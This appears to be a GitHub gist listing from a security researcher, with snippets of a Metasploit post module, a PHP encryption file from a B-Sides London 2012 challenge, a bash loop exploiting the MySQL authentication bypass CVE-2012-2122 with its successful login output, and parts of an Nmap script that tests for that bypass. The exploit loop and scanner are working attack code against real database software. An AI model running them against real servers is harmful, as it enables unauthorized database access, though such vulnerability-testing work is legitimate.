MW marcwickenden
marcwickenden
/ gist:1719670
Created
February 1, 2012 21:46
stat_file method added to lib/msf/core/post/file.rb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def stat_file(file_name) | |
| data = [] | |
| stat = {} | |
| if session.type == "meterpreter" | |
| raise "I think you can do this with session.fs.file.stat" | |
| elsif session.respond_to? :shell_command_token | |
| print_debug("platform is #{session.platform}") | |
| case session.platform | |
| when /windows/ |
marcwickenden
/ encryption.php
Created
April 29, 2012 23:45
Security B-Sides London 2012 Challenge 4
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| // encryption functions used for login | |
| function encrypt($value, $key){ | |
| if(!$value){return false;} | |
| $text = $value; | |
| $iv_size = mcrypt_get_iv_size(MCRYPT_RIJNDAEL_256, MCRYPT_MODE_ECB); | |
| $iv = mcrypt_create_iv($iv_size, MCRYPT_RAND); | |
| $ciphertext = mcrypt_encrypt(MCRYPT_RIJNDAEL_256, $key, $text, MCRYPT_MODE_ECB, $iv); | |
| return trim(base64_encode($ciphertext)); //encode for db | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ubuntu@ip-10-227-118-34:~$ for i in `seq 1 1000`; do mysql -u root --password=cve-2012-2122 -h 127.0.0.1 2>/dev/null; done | |
| Welcome to the MySQL monitor. Commands end with ; or \g. | |
| Your MySQL connection id is 424 | |
| Server version: 5.5.22-0ubuntu1 (Ubuntu) | |
| Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved. | |
| Oracle is a registered trademark of Oracle Corporation and/or its | |
| affiliates. Other names may be trademarks of their respective | |
| owners. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| for username in usernames do | |
| stdnse.print_debug( "Trying %s ...", username ) | |
| -- try up to 300 times to trigger the vuln | |
| for i = 0, 300, 1 do | |
| stdnse.print_debug(2, "attempt number %d", i ) | |
| local status, response = socket:connect(host, port) | |
| if( not(status) ) then return " \n ERROR: Failed to connect to mysql server" end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| status, response = mysql.receiveGreeting( socket ) | |
| if ( not(status) ) then | |
| stdnse.print_debug(3, SCRIPT_NAME) | |
| socket:close() | |
| return response | |
| end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'shortport' | |
| require 'stdnse' | |
| require 'mysql' | |
| require 'unpwdb' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| portrule = shortport.port_or_service(3306, "mysql") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| action = function( host, port ) | |
| local socket = nmap.new_socket() | |
| local catch = function() socket:close() end | |
| local try = nmap.new_try(catch) | |
| local result = {} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -- set a reasonable timeout value | |
| socket:set_timeout(5000) | |
| -- get our usernames to try | |
| local usernames = try(unpwdb.usernames()) | |
| local password = "cve-2012-2122" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| status, response = mysql.loginRequest( socket, { authversion = "post41", charset = response.charset }, username, password, response.salt ) | |
| if response.errorcode == 0 then | |
| table.insert(result, string.format("user %s is vulnerable to auth bypass", username ) ) | |
| break | |
| end |
OlderNewer